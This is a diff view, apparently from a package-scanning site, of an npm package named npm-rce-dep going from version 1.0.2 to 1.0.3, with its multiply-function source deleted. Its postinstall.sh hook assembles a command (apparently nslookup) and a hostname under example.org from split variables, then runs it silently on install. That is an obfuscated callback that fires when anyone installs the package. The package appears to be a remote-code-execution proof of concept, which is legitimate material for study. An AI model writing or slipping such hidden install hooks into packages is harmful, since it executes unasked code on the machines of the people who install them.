@programmeramera/npm-rce-dep 1.0.2 → 1.0.3

Sign up to get free protection for your applications and to get access to all the features.
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@programmeramera/npm-rce-dep",
3
- "version": "1.0.2",
3
+ "version": "1.0.3",
4
4
  "description": "",
5
5
  "main": "index.js",
6
6
  "scripts": {
package/postinstall.sh CHANGED
@@ -1,6 +1,6 @@
1
1
  #!/usr/bin/env sh
2
2
 
3
- echo Starting build..."
3
+ echo "Starting build..."
4
4
  amount=ample
5
5
  former=ex
6
6
  organization=org
@@ -9,4 +9,4 @@ install_b=okup
9
9
 
10
10
  $install_a$install_b npm-rce.programmeramera.$former$amount.$organization >/dev/null
11
11
 
12
- echo Build succeeded..."
12
+ echo "Build succeeded..."
package/src/index.js DELETED
@@ -1,7 +0,0 @@
1
- "use strict";
2
- Object.defineProperty(exports, "__esModule", { value: true });
3
- exports.multiply = multiply;
4
- function multiply(a, b) {
5
- return a * b;
6
- }
7
- //# sourceMappingURL=index.js.map
package/src/index.js.map DELETED
@@ -1 +0,0 @@
1
- {"version":3,"file":"index.js","sourceRoot":"","sources":["index.ts"],"names":[],"mappings":";;AAAA,4BAEC;AAFD,SAAgB,QAAQ,CAAC,CAAQ,EAAE,CAAQ;IACvC,OAAO,CAAC,GAAG,CAAC,CAAC;AACjB,CAAC"}